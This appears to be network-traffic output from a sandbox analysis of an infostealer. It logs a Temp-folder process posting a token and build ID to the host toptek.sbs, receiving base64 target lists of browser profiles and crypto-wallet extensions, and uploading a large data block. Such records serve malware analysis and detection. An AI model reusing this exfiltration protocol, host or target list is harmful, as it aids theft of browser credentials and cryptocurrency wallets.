2024-12-23 05:23:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:45 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:23:45 UTC | 69 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 3a1|1|1|1|0e82b28cfc26d5aa50292f6553065302|1|1|1|1|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49762 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:46 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----E3WBAIWTRQIM7Q9000ZC
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:23:46 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------E3WBAIWTRQIM7Q9000ZCContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------E3WBAIWTRQIM7Q9000ZCContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------E3WBAIWTRQIM7Q9000ZCCont
2024-12-23 05:23:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:47 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:23:47 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49767 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:48 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----T2DB1DBIMOZU3EU3O890
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:23:48 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------T2DB1DBIMOZU3EU3O890Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------T2DB1DBIMOZU3EU3O890Cont
2024-12-23 05:23:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:49 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:23:49 UTC | 5837 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49772 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:51 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----NGVKFKFKXLNYM7GV37Q9
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:23:51 UTC | 332 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------NGVKFKFKXLNYM7GV37Q9Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------NGVKFKFKXLNYM7GV37Q9Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------NGVKFKFKXLNYM7GV37Q9Cont
2024-12-23 05:23:52 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:51 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:23:52 UTC | 119 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49778 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:53 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 7857
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:53 UTC7857OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:54 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49780 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:54 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:23:54 UTC | 489 | OUT | Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------QQIEKNGVAAAAIE3O8Q16Cont
2024-12-23 05:23:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:23:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:23:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49790 | 142.250.181.132 | 443 | 6152 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:57 UTC | 615 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-23 05:23:58 UTC | 1266 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 05:23:58 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-040S8xGI7tCFU5tdwfhU8g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-23 05:23:58 UTC | 124 | IN | Data Ascii: 8f7)]}'["",["ufc news","best christmas movies","fortnite cyberpunk 2077 skins","bitcoin price","nasa astronauts stuck","m
2024-12-23 05:23:58 UTC | 1390 | IN | Data Ascii: arvel rivals heroes tier list","narayana murthy","christmas travel weather forecast"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl"
                                                                                                                                                                                                                                                                                                  Data Ascii: 3cf6TVdKNWswcjNPRXo5UlhlMWs0RGppd1BXbGdUeXl4UFpucUhZcG85YjdOU2FaY043VzBmMmJIbW9PU3Avd0JqMHFMZjJrdGplU1J1dkRJcmc0OEQvd0JwUHNYcWcwelc0NUdJRUV2c3BUNEFFN0g1SEI5TTE2UjJoMGVQVkxiaUMrM2pHVndjY1ErR3AycHVHZlphaTNZY0hxWmlLU0c2Z0RSM0FSdkxPNE5RZGJ1cmF4SXV0U25oN3FJO
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49793 | 142.250.181.132 | 443 | 6152 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:57 UTC | 518 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-23 05:23:58 UTC | 1018 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Mon, 23 Dec 2024 05:23:58 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49792 | 142.250.181.132 | 443 | 6152 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:57 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-23 05:23:58 UTC | 933 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Mon, 23 Dec 2024 05:23:58 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-23 05:23:58 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-23 05:23:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49816 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:02 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----LX4WBAS0ZU37QIM7Y5PZ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:02 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 58 34 57 42 41 53 30 5a 55 33 37 51 49 4d 37 59 35 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 57 42 41 53 30 5a 55 33 37 51 49 4d 37 59 35 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 34 57 42 41 53 30 5a 55 33 37 51 49 4d 37 59 35 50 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------LX4WBAS0ZU37QIM7Y5PZContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------LX4WBAS0ZU37QIM7Y5PZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LX4WBAS0ZU37QIM7Y5PZCont
2024-12-23 05:24:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:24:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49820 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:03 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEUKNGLFCBIMYUSRQI5F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 47 4c 46 43 42 49 4d 59 55 53 52 51 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 47 4c 46 43 42 49 4d 59 55 53 52 51 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 47 4c 46 43 42 49 4d 59 55 53 52 51 49 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------IEUKNGLFCBIMYUSRQI5FContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------IEUKNGLFCBIMYUSRQI5FContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------IEUKNGLFCBIMYUSRQI5FCont
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
